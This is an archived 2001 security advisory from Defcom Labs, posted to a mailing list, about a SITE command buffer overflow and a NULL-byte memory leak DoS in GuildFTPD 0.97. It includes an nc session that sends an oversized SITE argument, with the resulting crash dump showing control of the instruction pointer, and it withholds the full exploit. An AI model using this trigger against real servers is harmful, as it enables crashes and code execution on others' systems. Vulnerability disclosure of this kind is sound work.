def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS

From: andreas junestam (andreas.junestamat_private)
Date: Sun May 27 2001 - 13:37:06 PDT

Next message: Crispin Cowan: "Netscape Security Contact?"

Previous message: EnGarde Secure Linux: "[ESA-20010509-01] pine temporary file handling vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

======================================================================
                  Defcom Labs Advisory def-2001-27

               GuildFTPD Buffer Overflow and Memory Leak DoS

Author: Andreas Junestam <andreasat_private>
Co-Author: Janne Sarendal <janneat_private>
Release Date: 2001-05-22
======================================================================
------------------------=[Brief Description]=-------------------------
GuildFTPD contains two different problems:
1. Buffer overrun in the SITE command with the ability to execute
   arbitrary code
2. A memory leak in the input parsing code

------------------------=[Affected Systems]=--------------------------
- GuildFtpd v0.97 (probably earlier versions too)

----------------------=[Detailed Description]=------------------------
* SITE command Buffer Overflow
  All the SITE commands are handled in a dll(sitecmd.dll) which suffers
  from a buffer overflow. By sending a site command greater than 261
  bytes, a buffer will overflow and it is possible to execute
  arbitrary code. We have choosen not to include the working exploit.

  C:\>nc 127.0.0.1 21
  220-GuildFTPD FTP Server (c) 1999,2000
  220-Version 0.97
  220 Please enter your name:
  user a
  331 User name okay, Need password.
  pass a
  230 User logged in.
  site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000
edi=009ed9e0
  eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0         nv up ei pl nz
na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
efl=00010206

* Memory Leak DoS
  The input parsing code in GuildFTPD contains a memory leak that will
  trigger if you send it a request containing a NULL(0x0) character.
  GuildFTPD will still answer new requests, but, eventually the server
  will run out of memory and the machine will crash.

---------------------------=[Workaround]=-----------------------------
None for the moment

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the developer's attention on the 24th of
April,
2001, no response so far.

======================================================================
            This release was brought to you by Defcom Labs UK

              labsat_private             www.defcom.com
======================================================================

Next message: Crispin Cowan: "Netscape Security Contact?"
Previous message: EnGarde Secure Linux: "[ESA-20010509-01] pine temporary file handling vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon May 28 2001 - 09:59:47 PDT